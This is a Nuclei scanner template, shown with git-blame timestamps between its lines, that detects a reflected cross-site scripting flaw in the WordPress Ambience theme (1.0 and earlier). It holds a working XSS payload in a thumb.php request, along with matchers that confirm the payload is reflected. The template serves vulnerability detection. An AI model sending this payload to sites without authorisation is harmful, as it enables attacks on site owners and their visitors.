2021-07-11 02:16:13 +00:00
|
|
|
id: wp-ambience-xss
|
|
|
|
|
|
|
|
info:
|
2022-09-08 13:28:46 +00:00
|
|
|
name: WordPress Ambience Theme <=1.0 - Cross-Site Scripting
|
2021-07-11 02:16:13 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
2022-08-10 09:20:05 +00:00
|
|
|
description: |
|
2022-09-08 13:28:46 +00:00
|
|
|
WordPress Ambience Theme 1.0 and earlier was affected by a cross-site scripting vulnerability.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
2022-09-08 13:28:46 +00:00
|
|
|
- https://www.exploit-db.com/expl oits/38568
|
2022-08-06 16:54:58 +00:00
|
|
|
- https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
|
2022-09-08 13:28:46 +00:00
|
|
|
classification:
|
2023-03-03 15:27:54 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 5.4
|
|
|
|
cwe-id: CWE-80
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
2024-04-08 11:34:33 +00:00
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: wp-plugin,wp,edb,wpscan,wordpress,xss
|
2021-07-11 02:16:13 +00:00
|
|
|
|
2024-03-26 17:26:22 +00:00
|
|
|
flow: http(1) && http(2)
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2024-03-26 17:26:22 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}'
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
internal: true
|
|
|
|
words:
|
|
|
|
- '/wp-content/themes/ambience/'
|
|
|
|
|
2021-07-11 02:16:13 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-08-10 09:20:05 +00:00
|
|
|
part: body
|
2021-07-11 02:16:13 +00:00
|
|
|
words:
|
|
|
|
- "<body onload=alert(1)>"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-04-08 11:29:20 +00:00
|
|
|
# digest: 4b0a004830460221009232f4afd59234010128118d14a30759687b9b9ce4f930d8456800bc22cd871f0221009f4c523604a17d45f0026f5e812e98e03f08042d276219dd7d22835484c48c5a:922c64590222798bb761d5b6d8e72950
|